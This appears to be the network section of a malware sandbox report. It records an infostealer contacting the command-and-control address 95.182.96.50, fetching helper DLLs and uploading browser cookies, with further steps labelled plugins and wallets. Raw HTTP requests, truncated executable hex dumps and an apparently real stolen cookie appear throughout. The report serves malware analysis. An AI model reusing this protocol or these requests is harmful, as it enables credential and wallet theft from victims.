5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:54:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:54:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.182.96.50Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBKFIEBGCAAFIEBFCAEHost: 95.182.96.50Content-Length: 215Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 35 41 30 41 43 32 38 37 30 35 32 34 35 38 35 30 34 38 39 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 69 6e 74 65 61 6d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 2d 2d 0d 0a Data Ascii: ------GCBKFIEBGCAAFIEBFCAEContent-Disposition: form-data; name="hwid"0C5A0AC287052458504893------GCBKFIEBGCAAFIEBFCAEContent-Disposition: form-data; name="build"mainteam------GCBKFIEBGCAAFIEBFCAE--
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJKKKJJJKJKFHJJJJECHost: 95.182.96.50Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 2d 2d 0d 0a Data Ascii: ------JKJKKKJJJKJKFHJJJJECContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------JKJKKKJJJKJKFHJJJJECContent-Disposition: form-data; name="message"browsers------JKJKKKJJJKJKFHJJJJEC--
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDGDHDGDBFIDHDBAFHost: 95.182.96.50Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 2d 2d 0d 0a Data Ascii: ------KJDGDGDHDGDBFIDHDBAFContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------KJDGDGDHDGDBFIDHDBAFContent-Disposition: form-data; name="message"plugins------KJDGDGDHDGDBFIDHDBAF--
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDBAKFCFHCGDGCBAAKFHost: 95.182.96.50Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 2d 2d 0d 0a Data Ascii: ------BGDBAKFCFHCGDGCBAAKFContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------BGDBAKFCFHCGDGCBAAKFContent-Disposition: form-data; name="message"fplugins------BGDBAKFCFHCGDGCBAAKF--
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIIIIJKFCAAECAKFIEHHost: 95.182.96.50Content-Length: 6679Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/sqlite3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDAFIJJECFHJJKFCAKJHost: 95.182.96.50Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 46 49 4a 4a 45 43 46 48 4a 4a 4b 46 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 46 49 4a 4a 45 43 46 48 4a 4a 4b 46 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 46 49 4a 4a 45 43 46 48 4a 4a 4b 46 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 46 49 4a 4a 45 43 46 48 4a 4a 4b 46 43 41 4b 4a 2d 2d 0d 0a Data Ascii: ------EHDAFIJJECFHJJKFCAKJContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------EHDAFIJJECFHJJKFCAKJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------EHDAFIJJECFHJJKFCAKJContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCFBKKKFHCFHJKFIIEHHost: 95.182.96.50Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 2d 2d 0d 0a Data Ascii: ------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="file"------BFCFBKKKFHCFHJKFIIEH--
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGDHost: 95.182.96.50Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 2d 2d 0d 0a Data Ascii: ------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="file"------FCAAEBFHJJDAAKFIECGD--
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/freebl3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/mozglue.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/msvcp140.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/nss3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/softokn3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/vcruntime140.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIDHIEGIIIECAKEBFBAHost: 95.182.96.50Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKFHost: 95.182.96.50Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 2d 2d 0d 0a Data Ascii: ------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="message"wallets------FIEHDBGDHDAECBGDHJKF--
